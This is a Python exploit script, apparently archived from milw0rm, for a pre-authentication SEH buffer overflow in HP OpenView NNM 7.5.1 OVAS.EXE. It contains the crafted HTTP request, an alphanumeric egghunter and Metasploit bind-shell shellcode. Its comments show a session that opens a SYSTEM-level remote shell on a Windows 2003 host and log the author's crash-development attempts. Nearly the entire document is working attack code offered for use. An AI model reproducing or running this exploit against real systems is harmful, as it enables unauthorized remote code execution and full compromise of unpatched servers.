#!/usr/bin/python
################################################################################
# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
# Tested on Windows 2003 Server SP1.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
# [shameless plug]
# This vulnerability was found, analysed and exploited
# as part of a training module in "BackTrack to the Max".
# http://www.offensive-security.com/ilt.php
# [/shameless plug]
#################################################################################
# bt 0day# python hp-nnm-ov.py
# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil HTTP request to NNMz, ph33r
# [*] Egghunter working ...
# [*] Check payload results - may take up to a minute.
# bt 0day# nc -v 192.168.1.111 4444
# (muts) [192.168.1.111] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\>whoami
# whoami
# nt authority\system
#
# C:\>
#
################################################################################
# Insane, "We own all those registers, but how the heck do we get EIP"  method.
################################################################################
# crash = "T"*1300
#
#################################################################################
# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
#################################################################################
# Case  1 - Stack not happy:
# crash = "T"*989
#
# Case 2 - Stack happy, we own EIP - blessed by the angels above:
# 0x44442638 - Happy NNM address
# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510"
# 12 bytes of nasty strict alphanum shellcode possibility @EBP
#
################################################################################
# Unknown "wtf, these bytes are expanding" SEH method:
################################################################################
# 0x6d356c6e - POP POP RET somewhere in NNM
# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510"
#
################################################################################
# Final exploit crash SEH method:
################################################################################
# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510"
#
################################################################################

import socket
import os
import sys

print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
print "[*] http://www.offensive-security.com"

# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
# One egg to rule them all.

egghunter=(
"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
"U%521*-1-wD-1-wD-8$GwP")

alignstack="\x90"*34+"\x83\xc4\x03"

# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Spawned shell dies quickly as a result of a parent thread killing it.
# Best shellcodes are of the "instant" type, such as adduser, etc.

bindshell=("T00WT00W" + alignstack +
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d"
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44"
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31"
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a"
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56"
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32"
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56"
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1

evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510"

buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
buffer+= bindshell 

print "[*] Sending evil HTTP request to NNMz, ph33r"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.111", 7510))
expl.send(buffer)
expl.close()
print "[*] Egghunter working ..."
print "[*] Check payload results - may take up to a minute."

# milw0rm.com [2008-04-02]
